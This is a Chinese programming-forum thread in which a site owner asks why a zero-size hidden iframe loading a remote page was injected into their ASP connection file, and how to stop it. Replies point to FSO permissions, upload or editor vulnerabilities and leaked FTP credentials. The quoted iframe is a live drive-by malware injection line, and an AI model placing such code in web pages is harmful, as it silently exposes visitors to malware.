| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   

密 码:  
共有 1067 人关注过本帖
标题:网站被植入Trojan.DL.VBS.Agent.cll病毒,是程序漏洞导致的吗?如何解决呢? ...
只看楼主 加入收藏
没有人
等 级:新手上路
帖 子:136
专家分:0
注 册:2006-2-16
 问题点数:0 回复次数:6 
网站被植入Trojan.DL.VBS.Agent.cll病毒,是程序漏洞导致的吗?如何解决呢?急
在CONN文件里被人写入
<iframe src="http://www.hao123hao123.cn/ok/index.htm" width="0" height="0" frameborder="0"></iframe>

请问是程序漏洞导致的吗?如何屏蔽呢??急吖```
搜索更多相关主题的帖子: cll VBS Trojan Agent 漏洞 
在编程中沦落
威 望:4
帖 子:411
注 册:2005-12-25
得分:0 
检查一下你的程序或IIS,有没有漏洞,特别是FSO权限使用问题…………

没有人
FSO权限我不太了解啊?请具体教一下吧,谢谢

让压力来的更猛些..
没有人

因为我们网站是租用的别人服务器的空间,那我如何修改FSO权限呢?有过经验的请指教,在线急等

让压力来的更猛些..
gdk2006
等 级:业余侠客
威 望:8
帖 子:928
专家分:270
注 册:2006-7-2
FSO一般的空间都有这个权限的,关键是看你的系统是不是有漏洞,及时将漏洞补上,想上传类的组件漏洞什么的,还有编辑器的漏洞,在想想你的FTP是不是泄露了!

程序员的悲哀如何找女朋友?
追女解决方案百度“让她着迷”!
没有人
大哥,我还是搞不懂吖,我是通过FTP上传的ASP文件,我这边应该没问题啊?那是否导致被别人植入木马代码是因为它服务器的FSO权限设置有关或者它服务器的漏洞导致?

原来没有这方面的经验,还请大家指点指点,谢谢了

让压力来的更猛些..
天上碑
威 望:1
帖 子:111
注 册:2007-4-23
先对你的空间进行远程杀毒.然后在慢慢找你的程序漏洞.

我很郁闷!
快速回复:网站被植入Trojan.DL.VBS.Agent.cll病毒,是程序漏洞导致的吗?如何解 ...
数据加载中...

关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。